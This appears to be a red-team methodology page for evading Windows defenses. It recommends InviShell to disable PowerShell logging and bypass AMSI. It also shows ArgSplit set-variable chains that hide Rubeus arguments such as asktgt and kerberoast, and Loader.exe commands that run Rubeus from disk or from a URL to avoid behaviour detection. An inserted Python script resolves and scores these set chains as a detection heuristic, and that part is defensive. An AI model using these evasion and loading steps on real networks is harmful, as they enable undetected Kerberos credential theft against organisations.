# methodology

## PowerShell scripts

Use [InviShell](https://github.com/OmerYa/Invisi-Shell) to disable PowerShell logging; it has a built-in AMSI bypass.

Alternatively, use a standalone AMSI bypass.

If static detection is a problem, try obfuscating the tool.

## Binaries

<https://raw.githubusercontent.com/Raptoratack/ADTools/refs/heads/main/ArgSplit.bat>

<https://github.com/Raptoratack/ADTools/blob/main/Loader.exe>

Use ArgSplit to obfuscate the command argument (e.g. `kerberoast`, `asktgt`). Copy and paste all the `set` lines it prints:

```
[!] Argument Limit: 180 characters
[+] Enter a string: asktgt
set "z=t"
set "y=g"
set "x=t"
set "w=k"
set "v=s"
set "u=a"
set "Pwn=%u%%v%%w%%x%%y%%z%"
```

Check that `%Pwn%` expands to the argument you want.

Use Loader.exe to load our binaries (Rubeus example):

```batchfile
Loader.exe -Path Rubeus.exe -args %Pwn% /stats /rc4opsec
```
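From the detection side, the `set` chain above is easy to undo: every single-character variable is recorded in the process command line or script block log, so an analyst can resolve `%Pwn%` and see the real argument. The following Python is an added example (not part of this page or of the ADTools project) that parses captured `set` statements, expands the variable references the way `cmd.exe` does, and flags variables assembled purely from single-character parts; the sample lines are constructed from the ArgSplit output shown above, and the scoring heuristic is an assumption of this example rather than a documented detection rule.

```python
import re

# Constructed sample: the ArgSplit set chain as it would appear in a captured
# command line or script block log, one statement per line.
SAMPLE_LINES = [
    'set "z=t"',
    'set "y=g"',
    'set "x=t"',
    'set "w=k"',
    'set "v=s"',
    'set "u=a"',
    'set "Pwn=%u%%v%%w%%x%%y%%z%"',
]

# Matches both `set "name=value"` and the unquoted `set name=value` form.
SET_RE = re.compile(r'^\s*set\s+"?([A-Za-z_][A-Za-z0-9_]*)=([^"]*)"?\s*$', re.IGNORECASE)
# Matches a %NAME% reference inside a value or command line.
VAR_RE = re.compile(r'%([A-Za-z_][A-Za-z0-9_]*)%')


def parse_set_lines(lines):
    """Collect name -> raw value from set statements; cmd.exe names are case-insensitive."""
    env = {}
    for line in lines:
        m = SET_RE.match(line)
        if m:
            env[m.group(1).lower()] = m.group(2)
    return env


def expand(value, env, depth=0):
    """Recursively replace %NAME% references using env; unknown names are left as-is
    so the analyst can see which pieces were not captured."""
    if depth > 32:  # guard against self-referencing chains
        return value

    def repl(m):
        name = m.group(1).lower()
        if name in env:
            return expand(env[name], env, depth + 1)
        return m.group(0)

    return VAR_RE.sub(repl, value)


def resolve_variables(lines):
    """Return every variable fully expanded."""
    env = parse_set_lines(lines)
    return {name: expand(raw, env) for name, raw in env.items()}


def score_argsplit(lines):
    """Heuristic (assumed, not a vendor rule): report how many single-character
    variables were set and which variables are built only from them."""
    env = parse_set_lines(lines)
    single = {k for k, v in env.items() if len(v) == 1}
    assembled = {}
    for k, v in env.items():
        refs = {r.lower() for r in VAR_RE.findall(v)}
        if refs and refs <= single:
            assembled[k] = expand(v, env)
    return {"single_char_vars": len(single), "assembled": assembled}


def deobfuscate_command(command_line, lines):
    """Expand a later command line (e.g. a Loader.exe invocation) using the captured chain."""
    return expand(command_line, parse_set_lines(lines))


if __name__ == "__main__":
    print(resolve_variables(SAMPLE_LINES))
    print(score_argsplit(SAMPLE_LINES))
    print(deobfuscate_command("Loader.exe -Path Rubeus.exe -args %Pwn% /stats /rc4opsec", SAMPLE_LINES))
```

Running it on the sample prints `pwn` resolved to `asktgt`, reports six single-character variables with one assembled variable, and rewrites the Loader.exe command line with the argument in clear. A run of single-character `set` assignments followed by a variable that references only those is a strong signal on its own, independent of what the resolved string turns out to be.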

Use Loader.exe with the behaviour detection bypass (binary loaded from a URL instead of disk):

```batchfile
Loader.exe -Path http://127.0.0.1:8080/Rubeus.exe -args %Pwn% /stats /rc4opsec
```
